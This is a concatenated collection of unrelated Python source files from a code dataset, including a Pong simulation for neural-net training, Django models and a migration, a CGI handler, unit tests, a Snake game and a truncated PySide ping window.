Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
##############################
### veränderbare Parameter ###
##############################
# Größe des Spielfeldes (standardmäßig 16 zu 9; hat bei Tests bewährt)
self.x_max = 16.0
self.y_max = 9.0
# Ballgeschwindigkeit
# (Faktor für den Richtungs-/Bewegungsvektor / die Ballgeschwindigkeit;
# NeuerOrtsvektor = AlterOrtsvektor + Richtungs-/Bewegungsvektor * Ballgeschwindigkeitsfaktor)
self.speed = 0.5
# Rauschen auf die Ballposition hinzufügen (Faktor)
self.outputNoiseMax = 0.0 # Achtung: Noch nie mit Rauschen getestet! Sollte bei 0 bleiben!
# Soll der Ball aus dem Spielfeld fliegen können oder ewig hin und her springen?
# True -> Ball fliegt ewig hin und her, wird bei einem Tor nicht auf Startposition zurückgesetzt
# False -> Ball wird bei Tor zurückgesetzt auf die Startposition
self.infinite = False
# Größe der Schläger von Spieler 0 und 1
# (von der Mitte zum Ende, d.h hier die halbe Länge der gewünschten Gesamtlänge eintragen!)
self.batsize = 1.0
# Im Befehlsmodus kann der Schläger mit den Befehlen 'u' und 'd' bewegt werden.
# Hier wird die dazugehörige Sprungweite des Schlägers angegeben.
self.batstep = 0.3
############################################
### Initialisierungen (nicht verändern!) ###
############################################
# Ortsvektor des Balles (Bezugspunkt ist [0,0])
self.posVec = None
# Richtungs-/Bewegungsvektor des Balles (Einheitsvektor)
self.dirVec = None
# Binärer Speicher, ob der Ball den einen Schläger getroffen hat [links, rechts]
self._bathit = [False, False]
# Binärer Speicher, ob der Ball die Linie geflogen ist [links, rechts]
self._out = [False, False]
# Punktestand [Spieler 0, Spieler 1]
self.Points = [0, 0]
# Der "Einschlagspunkt" des Balles auf der (Toraus-)Linie, wird erst nach einem Aufprall
# mit konkreten Werten belegt und dann zur Fehlerberechnung genutzt (supervised learning).
self.poi = [None, None]
# Initiale Schlägerpositionen der Spieler auf ihren Linien.
# [SchlängerLinks, SchlägerRechts]
# Positionsänderungen sind somit, wie in Pong üblich, nur auf der Y-Achse möglich.
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
# Zählt die Schlägertreffer (Kollisionen des Balles mit einem Schläger).
# Die KNNs sollen unterschiedliche Winkel lernen (der Winkel wird immer zufallsinitialisiert),
# bei ausreichender Lerndauer bzw. stark minimiertem Fehler jedoch sind die KNNs manchmal auf
# einigen Winkeln derart talentiert, dass der Ball nie mehr über die Torlinie gehen würde.
# Um ein solches "Endlosspiel" zu verhindern, wird der Ball nach 10 Treffern resettet,
# das Spielfeld also zurückgesetzt mit einer initialen Ballposition auf der Spielfeldmitte und
# neuem, zufallskalkuliertem Winkel.
self.bouncecount = 0
# Startvorbereitung
# Initialisiert das erste Mal den Ortsvektor und Bewegungs-/Richtungsvektor
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
# Richtungsvektor erzeugen
# Zufallswinkel im Bogenmaß generieren
# 2 Pi entsprechen dem vollen Einheitskreis, also 360°
# [-Pi/4, +Pi/4] entspricht einem Interval von [-45°, +45°]
# Dieses Interval hat sich bewährt, da zu spitze den Lerneffekt und vor allem die Lerndauer
# negativ beeinflussen.
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
# Aus dem Zufallswinkel eine entsprechende Rotationsmatrix generieren
rotMatrix = np.array([
[np.cos(rotationAngle), -np.sin(rotationAngle)],
[np.sin(rotationAngle), np.cos(rotationAngle)]
])
# Rotationsmatrix auf einen Einheitsvektor (horizontale Ausrichtung) anwenden
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
# Zufällig entscheiden, ob der Ball nach links (zu Player 0) oder rechts (zu Player 1) startet.
if random.random() > 0.5:
self.dirVec[0] *= -1.0 # x-Komponente des Richtungs-/Bewegungsvektors wird an der Y-Achse gespiegelt
# Ortsvektor erzeugen
# Start irgendowo auf der Mittellinie
# (x-Koordinate ist also fixiert auf die Mittellinie, y-Koordinate zufällig)
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()])
# Rücksetzen der Anzahl der Schlägertreffer (__init__)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
def __sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, Y-Anteil vom Ortsvektor
"""
return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax
def __sensor_bat(self, player):
"""
Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, Schlägerposition von Spieler[Player]
"""
return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player) ) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
#########################
### Initialisierungen ###
#########################
# Setzt den Ball eine Position weiter.
# Die Schrittweite wird durch den Faktor self.speed gesetzt, der den Einheitsvektor dirVec skaliert
self.posVec += self.dirVec * self.speed
# Hat der Schläger den Ball getroffen?
# bathit[0] -> linker Schläger
# bathit[1] -> rechter Schläger
self._bathit = [False, False]
self._out = [False, False]
###################
### Anweisungen ###
###################
# Falls 10 oder mehr Treffer also jeder mindestens 5x getroffen hat, dann wird abgebrochen
# und neu gestartet, damit die aktuelle Endlosschleife unterbrochen wird. Hier würde das KNN
# sonst nichts Neues mehr lernen.
if self.bouncecount > 10:
self.__initvectors()
# Abprallen an der Unterseite bei Y = 0
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
# Abprallen an der Oberseite bei Y = y_max (hier vermutlich 9)
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
# Prüfe auf Treffer auf der linken Seite (Spieler 0)
self.__tickBounceLeft()
# Prüfe auf Treffer auf der rechten Seite (Spieler 1)
self.__tickBounceRight()
def __tickBounceLeft(self):
"""
Checken, ob der Ball links bei Spieler 0 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
# Wenn der Ortsvektor kleiner ist als 0, dann hat er die Torauslinie von Spieler 0 überschritten
if self.posVec[0] < 0:
# Berechne den theoretischen, genauen Aufprallpunkt (poi: PointOfImpact)
# auf der Linie von Spieler 0 (Y = 0)
factor = (0 - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + (factor * self.dirVec)
self.poi[0] = poi[1] # Speichere diesen für eine evtl. spätere Nutzung von z.B. scaled_sensor_err(player)
# Prüfe ob der Ball dann den Schläger getroffen hätte, wenn ja, dann...
if (poi[1] > self.bat[0] - self.batsize) and (poi[1] < self.bat[0] + self.batsize):
self._bathit[0] = True # ... vermerke dies für z.B. hitbat(player)
else: # wenn jedoch nicht, dann...
self.Points[1] += 1 # ... Punkte von Spieler 1 (rechts) erhöhen
self._out[0] = True # und merken, das der Ball außerhalb des Spielfelds
# war, z.B. für out(player)
# Ball abprallen lassen, falls:
# -> Infinite true ist, also das Spiel endlos dauern soll ohne Zurücksetzen der Ballposition
# -> Der Schläger den Ball getroffen hat
if self.infinite or self._bathit[0]:
self.posVec[0] *= -1.0 # Einfallswinklel = Ausfallswinkel
self.dirVec[0] *= -1.0
self.bouncecount += 1 # Treffer vermerken, um bei zu vielen Treffern dieses neu zu starten
else:
self.__initvectors() # Kein Treffer, somit das Spiel neu Initialisieren.
self.bouncecount = 0
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
# Wenn der Ortsvektor größer ist als x_max (hier vermutlich 16), dann hat er die Torauslinie
# von Spieler 1 überschritten
if self.posVec[0] > self.x_max:
# Berechne den theoretischen, genauen Aufprallpunkt (poi: PointOfImpact) auf der Linie von
# Spieler (Y = self.x_max)
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + (factor * self.dirVec)
self.poi[1] = poi[1] # Speichere diesen für eine evtl. spätere Nutzung von z.B. scaled_sensor_err(player)
# Prüfe ob der Ball dann den Schläger getroffen hätte, wenn ja, dann...
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1] + self.batsize:
self._bathit[1] = True # ... vermerke dies für z.B. hitbat(player)
else: # wenn jedoch nicht, dann...
self.Points[0] += 1 # ... Punkte von Spieler 0 (links) erhöhen
self._out[1] = True # und merken, das der Ball außerhalb des Spielfelds
# war, z.B. für out(player)
# Ball abprallen lassen, falls:
# -> Das infinite true ist, also das Spiel endlos dauern soll ohne Zurücksetzen der Ballposition
# -> Der Schläger den Ball getroffen hat
if self.infinite or self._bathit[1]:
# 2 Spielfeldlängen - aktuellem X-Betrag ergibt neue X-Position
self.posVec[0] = 2 * self.x_max - self.posVec[0] # Einfallswinklel = Ausfallswinkel
self.dirVec[0] *= -1.0
self.bouncecount += 1 # Treffer vermerken, um bei zu vielen Treffern dieses neu zu starten
else:
self.__initvectors() # Kein Treffer, somit das Spiel neu Initialisieren.
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
# Wenn ein String, dann im Befehls-Modus:
if type(action) == str:
# Den Schläger nach oben bewegen
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde
self.bat[player] = self.y_max
# Den Schläger nach unten bewegen
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde
self.bat[player] = 0.0
# Sonst im Setzen-Modus:
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2 # Der Schläger wird direkt auf die gewünschte Position gesetzt
if self.bat[player] < 0.0: # Korrektur, falls der untere Spielfeldrand erreicht wurde
self.bat[player] = 0.0
if self.bat[player] > self.y_max: # Korrektur, falls der obere Spielfeldrand erreicht wurde
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
def v_getBatSize(self):
"""
visu-getter
:return float Schlägerlänge (Größe)
"""
return self.batsize
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
def v_getPoint(self):
"""
visu-getter
:return: Liste [X,Y] des Punktestundes für Spieler 0 / 1
"""
return self.Points |
5,648 | 6e78d1fb2364d334f47fea89b065d859c025ca2f | #!/usr/bin/env python
#!-*-coding:utf-8 -*-
"""
@version: python3.7
@author: ‘v-enshi‘
@license: Apache Licence
@contact: 123@qq.com
@site:
@software: PyCharm
@file: Images_fade.py
@time: 2019/1/16 17:17
"""
from PIL import Image
import numpy as np
filename = "hw0_data/westbrook.jpg"
im=Image.open(filename) #open the image
imgs = np.array(im) #transform to array
imgsDiv2 = np.trunc(imgs/2)
imgInt = imgsDiv2.astype(np.int)
imgInt = imgInt[:,:,:3]
finalImg = Image.fromarray(np.uint8(imgInt))
finalImg.save("Q2.jpg")
#注意img如果是uint16的矩阵而不转为uint8的话,Image.fromarray这句会报错
|
5,649 | a0dcfb738451c11ed4ff1428629c3f7bbf5c52c9 | from django.db import models
ch=[
('Garment','Garment'),
('Hardgoods','Hardgoods'),
('Home Furnishing','Home Furnishing'),
]
class Factory(models.Model):
name = models.CharField(max_length=30,choices=ch)
def __str__(self):
return self.name
class Fabric(models.Model):
name = models.ForeignKey(Factory, on_delete=models.CASCADE,null=True,blank=True)
fabric = models.CharField(unique=True,max_length=100,null=True,blank=True)
def __str__(self):
return self.fabric
class Wash(models.Model):
name=models.ForeignKey(Fabric,on_delete=models.CASCADE,null=True,blank=True)
wash = models.CharField(unique=True,max_length=100,null=True,blank=True)
def __str__(self):
return self.wash
class Category(models.Model):
cat=models.ForeignKey(Factory,on_delete=models.CASCADE,blank=True)
name = models.ForeignKey(Wash, on_delete=models.CASCADE,null=True,blank=True)
category = models.CharField(unique=True,max_length=100,null=True,blank=True)
def __str__(self):
return self.category
class Subcategory(models.Model):
name = models.ForeignKey(Category, on_delete=models.CASCADE,null=True,blank=True)
subcategory = models.CharField(unique=True,max_length=100,null=True,blank=True)
def __str__(self):
return self.subcategory
class Department(models.Model):
name = models.ForeignKey(Subcategory, on_delete=models.CASCADE,null=True,blank=True)
department = models.CharField(unique=True,max_length=100,null=True,blank=True)
def __str__(self):
return self.department
class Sections(models.Model):
name = models.ForeignKey(Department, on_delete=models.CASCADE,null=True,blank=True)
section = models.CharField(unique=True,max_length=100,null=True,blank=True)
def __str__(self):
return self.section
class Subsection(models.Model):
name = models.ForeignKey(Sections, on_delete=models.CASCADE,null=True,blank=True)
subsection = models.CharField(unique=True,max_length=500,null=True,blank=True)
def __str__(self):
return self.subsection
class Person(models.Model):
name=models.CharField(max_length=30)
fact=models.ForeignKey(Factory,on_delete=models.CASCADE)
fab=models.ForeignKey(Fabric,on_delete=models.CASCADE,null=True)
was= models.ForeignKey(Wash, on_delete=models.CASCADE,null=True)
cate = models.ForeignKey(Category, on_delete=models.CASCADE)
subcat=models.ForeignKey(Subcategory,on_delete=models.CASCADE)
dept = models.ForeignKey(Department, on_delete=models.CASCADE,null=True)
sect=models.ForeignKey(Sections,on_delete=models.CASCADE,null=True)
subsect=models.ForeignKey(Subsection,on_delete=models.CASCADE,null=True)
def __str__(self):
return str(self.name)
|
5,650 | 5282e9a9e87fd7fd6053f816048f371fbe190046 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from tp_global import *
from cgibase import cgibase
from tp_mongodb import *
import json
import requests
class Ccase_model(cgibase):
def __init__(self):
return cgibase.__init__(self)
def onInit(self):
cgibase.SetNoCheckCookie(self)
opr = cgibase.onInit(self)
if opr is None:
return
if not hasattr(self, opr):
self.out = g_err["input_err"]
return
eval("self.%s()"%opr)
# 新增模版,所需参数opr,name, pid, ip, url, method, type
def cmadd(self):
self.log.debug("cmadd in.")
req = self.input["input"]
# 模版名
name = req["name"]
# 模版所属项目id
pid = req["pid"]
# API主机
ip = req["ip"]
# 请求url
url = req["url"]
# 请求方法
method = req["method"]
# 请求类型
type = req["type"]
# 新增成功则返回模版ID,失败返回空
num = Case_model().cmadd(name=name, pid=pid, ip=ip, url=url,
method=method, type=type)
if num:
# 重新查询
total = Case_model().cmquery_total(pid=pid)
list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)
self.out = {"status": 0, "total": total, "data": list0}
else:
self.out = {"status":1}
# 查询指定项目模版列表,所需参数opr,pid,page
def cmquery(self):
self.log.debug("cmquery in.")
req = self.input["input"]
# 指定项目id
pid = req["pid"]
# 当前页码数,第一次查询是默认为0
page = req["page"]
# 每页显示条数
limitnum = 8
if page:
# 数据库查询时跳过的条数
skipnum = (int(page)-1) * limitnum
list0 = Case_model().cmquery_page(pid=pid, skip_num=skipnum, limit_num=limitnum)
self.out = {"data": list0}
else:
# 第一次查询,页码为0,查询总条数,用于前台分页
total = Case_model().cmquery_total(pid=pid)
list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=limitnum)
self.out = {"total": total, "data": list0}
# 查询指定项目模版的id和名称,用于新增用例,所需参数opr,pid
def cmquery_id_name(self):
self.log.debug("cmquery_id_name in.")
req = self.input["input"]
# 指定的项目id
pid = req["pid"]
list0 = Case_model().cmquery_id_name(pid=pid)
self.out = {"data": list0}
# 通过模块名称模糊查询指定项目模版列表,所需参数opr,pid,name,page
def cmquery_by_name(self):
self.log.debug("cmquery_by_name in.")
req = self.input["input"]
# 指定项目id
pid = req["pid"]
# 模版名称
name = req["name"]
# 当前页码数,第一次查询是默认为0
page = req["page"]
# 每页显示条数
limitnum = 8
if page:
# 数据库查询时跳过的条数
skipnum = (int(page) - 1) * limitnum
list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=skipnum, limit_num=limitnum, name=name)
self.out = {"data": list0}
else:
# 第一次查询,页码为0,查询总条数,用于前台分页
total = Case_model().cmquery_total_by_name(pid=pid, name=name)
list0 = Case_model().cmquery_page_by_name(pid=pid, skip_num=0, limit_num=limitnum, name=name)
self.out = {"total": total, "data": list0}
# 通过id去查询用例模版,所需参数opr,id
def cmquery_by_id(self):
self.log.debug("cmquery_by_id in.")
req = self.input["input"]
# 模版id
id = req["id"]
case_model = Case_model().cmqueryone(id=id)
if case_model:
self.out = {"status": 0, "data": case_model}
else:
self.out = {"status": 1}
# 编辑模版,所需参数opr, id, name, pid, ip, url, method, type
def cmupdate(self):
self.log.debug("cmupdate in.")
req = self.input["input"]
# 模版id
id = req["id"]
# 模版名
name = req["name"]
# 项目名
pid = req["pid"]
# API主机
ip = req["ip"]
# 请求url
url = req["url"]
# 请求方法
method = req["method"]
# 请求类型
type = req["type"]
# 返回true(更新成功)/false(更新失败)
istrue = Case_model().cmupdate(id=id, name=name, pid=pid,
ip=ip, url=url, method=method, type=type)
if istrue:
# 重新查询
total = Case_model().cmquery_total(pid=pid)
list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)
self.out = {"status": 0, "total": total, "data": list0}
else:
self.out = {"status":1}
# 删除模版,所需参数opr,id,pid
def cmdelete(self):
self.log.debug("cmdelete in.")
req = self.input["input"]
# 模版id
id = req["id"]
# 项目id
pid = req["pid"]
# 批量删除
if isinstance(id, list):
# 成功删除的个数
total = 0
# 循环删除
for i in id:
num = Case_model().cmdelete(i)
if num:
total += 1
if total == len(id):
# 重新查询
total = Case_model().cmquery_total(pid=pid)
list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)
self.out = {"status": 0, "total": total, "data": list0}
else:
self.out = {"status": 1}
# 删除单个
else:
# 返回1(删除成功)/0(删除失败)
num = Case_model().cmdelete(id)
if num:
# 重新查询
total = Case_model().cmquery_total(pid=pid)
list0 = Case_model().cmquery_page(pid=pid, skip_num=0, limit_num=8)
self.out = {"status": 0, "total": total, "data": list0}
else:
self.out = {"status": 1}
if __name__ == "__main__":
pass |
5,651 | 7b726dd8ebbd5c49f9ce5bddb4779fcfbaaeb479 | from .gsclient import GSClient
from .gspath import GSPath
__all__ = [
"GSClient",
"GSPath",
]
|
5,652 | 3313f01ed98433f4b150c4d8e877ac09eb8403b4 |
from django.conf.urls import url
from tree import views
urlpatterns = [
url('/home', views.home),
url('/about', views.about),
] |
5,653 | 0a50b31155afce2558ec066267a9fd0c56964759 | from Store import Store
from MusicProduct import MusicProduct
class MusicStore(Store):
def make_product(self, name):
'''Overides from parent - return a new MusicProduct Object'''
|
5,654 | b328ee0b6c5afaf496297cefe477f933af458a03 | import unittest
from utils import getParams
from utils.httpUtil import HttpUtil
from utils.logger import Log
logger = Log(logger='cms_getMarket').get_log()
class NavTest(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.url = getParams.get_url('cms_getMarket', 'getMarket')
HttpUtil.get_token()
@classmethod
def tearDownClass(cls) -> None:
pass
def test01_getMarket(self):
resp_c = getParams.get_resp_params('cms_getMarket', 'getMarket', 'code')
resp_m = getParams.get_resp_params('cms_getMarket', 'getMarket', 'msg')
response = HttpUtil().do_get(self.url)
self.assertEqual(resp_c, response['code'])
self.assertEqual(resp_m, response['msg'])
|
5,655 | 8af9cc32b445402fa790b29382a802bd8afc1100 | # Generated by Django 2.2.4 on 2019-09-09 11:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0002_ordered'),
]
operations = [
migrations.AlterField(
model_name='generalinfo',
name='amount_available',
field=models.IntegerField(blank=True, default=False, null=True, verbose_name='У наявності'),
),
migrations.AlterField(
model_name='generalinfo',
name='image',
field=models.URLField(blank=True),
),
]
|
5,656 | fbe091b1cf3ecc2f69d34e3b1c399314b38ebc4a | import arcade
WINDOW_WIDTH = 740
WINDOW_HEIGHT = 740
dark_green = (170, 216, 81)
light_green = (162, 210, 73)
snake_color = (72, 118, 235)
def square(square_x, square_y, square_width, square_height, square_color):
""" Code that sets up the squares for generation """
arcade.draw_rectangle_filled(square_x, square_y, square_width, square_height, square_color)
def generate_grid():
""" Code that generates the grid """
y_offset = -10
for a in range(20):
# Line 1
# Adds offset to the x position of the squares
x_offset = 10
for b in range(1):
# Adds offset to the y position of the squares
y_offset += 20
for c in range(20):
# Prints a row of squares(5 squares along the x)
square(x_offset, y_offset, 20, 20, dark_green)
for d in range(1):
# Adds x offset for the next line of squares on the y axis
x_offset += 40
# Line 2 (needs 2 lines because the offset of each line)
# Adds offset to the x position of the squares
x_offset = 30
for e in range(1):
# Adds offset to the y position of the squares
y_offset += 20
for f in range(20):
# Prints a row of squares(5 squares along the x)
square(x_offset, y_offset, 20, 20, dark_green)
for g in range(1):
# Adds x offset for the next line of squares on the y axis
x_offset += 40
def apple():
""" Draws an apple """
arcade.draw_circle_filled(230, 490, 9.5, (231, 71, 29))
def snake(snake_x, snake_y, snake_scale_x, snake_scale_y, snake_color):
""" Code that sets up the snake part to be drawn """
arcade.draw_rectangle_filled(snake_x, snake_y, snake_scale_x, snake_scale_y, snake_color)
def on_draw(delta_time):
""" Draw everything every frame(we chose in on_draw.schedule(e.g I chose 1/3 so every 1/3 of a second a frame is
drawn)). """
# draws all our objects
arcade.start_render()
generate_grid()
apple()
snake(on_draw.snake_part_x, on_draw.snake_part_y, 20, 20, snake_color)
snake(on_draw.snake_part2_x, on_draw.snake_part2_y, 20, 20, snake_color)
snake(on_draw.snake_part3_x, on_draw.snake_part3_y, 20, 20, snake_color)
snake(on_draw.snake_part4_x, on_draw.snake_part4_y, 20, 20, snake_color)
snake(on_draw.snake_part5_x, on_draw.snake_part5_y, 20, 20, snake_color)
snake(on_draw.snake_part6_x, on_draw.snake_part6_y, 20, 20, snake_color)
if on_draw.snake_part_x <= 230:
snake(on_draw.snake_part6_x + 20, on_draw.snake_part6_y, 20, 20, snake_color)
""" If statements that will make snake part one move """
if on_draw.snake_part_x >= 550:
on_draw.snake_part_x -= 20
elif on_draw.snake_part_x <= 550:
on_draw.snake_part_y += 20
if on_draw.snake_part_y >= 500:
on_draw.snake_part_y -= 20
on_draw.snake_part_x -= 20
if on_draw.snake_part_x <= 180:
on_draw.snake_part_x += 20
""" If statements that will make snake part two move """
if on_draw.snake_part2_x >= 550:
on_draw.snake_part2_x -= 20
elif on_draw.snake_part2_x <= 550:
on_draw.snake_part2_y += 20
if on_draw.snake_part2_y >= 500:
on_draw.snake_part2_y -= 20
on_draw.snake_part2_x -= 20
if on_draw.snake_part2_x <= 200:
on_draw.snake_part2_x += 20
""" If statements that will make snake part three move """
if on_draw.snake_part3_x >= 550:
on_draw.snake_part3_x -= 20
elif on_draw.snake_part3_x <= 550:
on_draw.snake_part3_y += 20
if on_draw.snake_part3_y >= 500:
on_draw.snake_part3_y -= 20
on_draw.snake_part3_x -= 20
if on_draw.snake_part3_x <= 220:
on_draw.snake_part3_x += 20
""" If statements that will make snake part four move """
if on_draw.snake_part4_x >= 550:
on_draw.snake_part4_x -= 20
elif on_draw.snake_part4_x <= 550:
on_draw.snake_part4_y += 20
if on_draw.snake_part4_y >= 500:
on_draw.snake_part4_y -= 20
on_draw.snake_part4_x -= 20
if on_draw.snake_part4_x <= 240:
on_draw.snake_part4_x += 20
""" If statements that will make snake part five move """
if on_draw.snake_part5_x >= 550:
on_draw.snake_part5_x -= 20
elif on_draw.snake_part5_x <= 550:
on_draw.snake_part5_y += 20
if on_draw.snake_part5_y >= 500:
on_draw.snake_part5_y -= 20
on_draw.snake_part5_x -= 20
if on_draw.snake_part5_x <= 260:
on_draw.snake_part5_x += 20
""" If statements that will make snake part six move """
if on_draw.snake_part6_x >= 550:
on_draw.snake_part6_x -= 20
elif on_draw.snake_part6_x <= 550:
on_draw.snake_part6_y += 20
if on_draw.snake_part6_y >= 500:
on_draw.snake_part6_y -= 20
on_draw.snake_part6_x -= 20
if on_draw.snake_part6_x <= 280:
on_draw.snake_part6_x += 20
# Sets a initial value to on_draw.snake_part_x(this is the starting position of the snake)
on_draw.snake_part_x = 570
on_draw.snake_part_y = 130
on_draw.snake_part2_x = 590
on_draw.snake_part2_y = 130
on_draw.snake_part3_x = 610
on_draw.snake_part3_y = 130
on_draw.snake_part4_x = 630
on_draw.snake_part4_y = 130
on_draw.snake_part5_x = 650
on_draw.snake_part5_y = 130
on_draw.snake_part6_x = 670
on_draw.snake_part6_y = 130
def main():
""" Main code the calls all the rest of the code """
arcade.open_window(WINDOW_WIDTH, WINDOW_HEIGHT, "Snake.exe")
# Set the window background colour
arcade.set_background_color(light_green)
# Calls the on_draw method every 1/3(20 seconds) of a second
arcade.schedule(on_draw, 1/3)
# Keeps the window open until closed by the user
arcade.run()
main()
|
5,657 | 75b1d2fb927063669a962f72deb57323001c0b7a | '''
Created on 17 june, 2018
@author: sp977u@att.com (Satish Palnati)
This class is for
'''
import sys
from PySide.QtGui import *
from PySide.QtCore import *
from PySide import QtGui
from PySide import QtCore
class PingWindow:
wind_close_flg = False
def __init__(self,last_parent):
self.last_parent = last_parent
self.main_widget = QWidget()
self.main_widget.setMaximumHeight(400)
self.parent_layout = QVBoxLayout()
#self.last_parent.right_base_layout_v
self.ping_log_layout = QHBoxLayout()
self.progress_bar_layout = QHBoxLayout() #to incorporate the progress bar and the buttons
self.secondary_progress_layout = QVBoxLayout() #just the progress bar
self.control_button_layout = QGridLayout() #cancel,close,open valid / invalid file
# UP ip layout for ping logs
self.up_ip_layout = QVBoxLayout()
self.up_ip_btn = QtGui.QLabel("UP Nodes")
self.up_ip_btn.setFont(QtGui.QFont("Verdana", 10, QtGui.QFont.Bold))
self.up_ip_btn.setStyleSheet("background-color:white ;color:Green;border: 2px solid black")
self.up_ip_layout.addWidget(self.up_ip_btn)
self.up_ip_btn.setToolTip("Please click here to open UP NODE file.. !")
self.up_ip_btn.setStyleSheet("""QToolTip { background-color: #00bfff; color: black; border: black solid 1px }""")
self.up_ip_textbox = QPlainTextEdit()
self.up_ip_textbox.setFont(QtGui.QFont("Verdana", 10, QtGui.QFont.Bold))
self.up_ip_textbox.setStyleSheet("background-color: rgb(150,240,190) ;color:rgb(9,57,31);border: 2px solid black; ")
self.up_ip_textbox.setReadOnly(True)
self.up_ip_layout.addWidget(self.up_ip_textbox)
